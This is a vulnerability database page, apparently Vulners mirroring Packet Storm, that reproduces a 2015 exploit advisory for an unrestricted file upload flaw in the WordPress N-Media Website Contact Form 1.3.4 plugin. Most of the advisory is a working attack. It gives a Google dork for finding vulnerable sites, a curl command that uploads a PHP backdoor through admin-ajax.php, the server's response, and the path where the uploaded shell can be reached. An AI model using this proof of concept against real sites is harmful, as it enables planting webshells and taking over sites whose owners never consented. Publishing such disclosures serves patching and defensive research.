Lucene search
K

WordPress N-Media Website Contact Form 1.3.4 Shell Upload

🗓️ 14 Apr 2015 00:00:00Reported by Claudio VivianiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

WordPress N-Media Website Contact Form 1.3.4 Shell Upload vulnerabilit

Code
`######################  
  
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability  
  
# Exploit Author : Claudio Viviani  
  
  
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip  
  
# Date : 2015-04-1  
  
# Dork Google: index of website-contact-form-with-file-upload  
index of /uploads/contact_files/  
  
# Tested on : Linux BackBox 4.0 / curl 7.35.0  
  
#####################  
  
# Info :   
  
The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.  
  
  
######################  
  
# PoC:  
  
curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php  
  
  
Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}  
  
  
######################  
  
# Backdoor Location:  
  
http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php  
  
  
#####################  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
http://ffhd.homelab.it (Free Fuzzy Hashes Database)  
  
[email protected]  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
  
#####################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation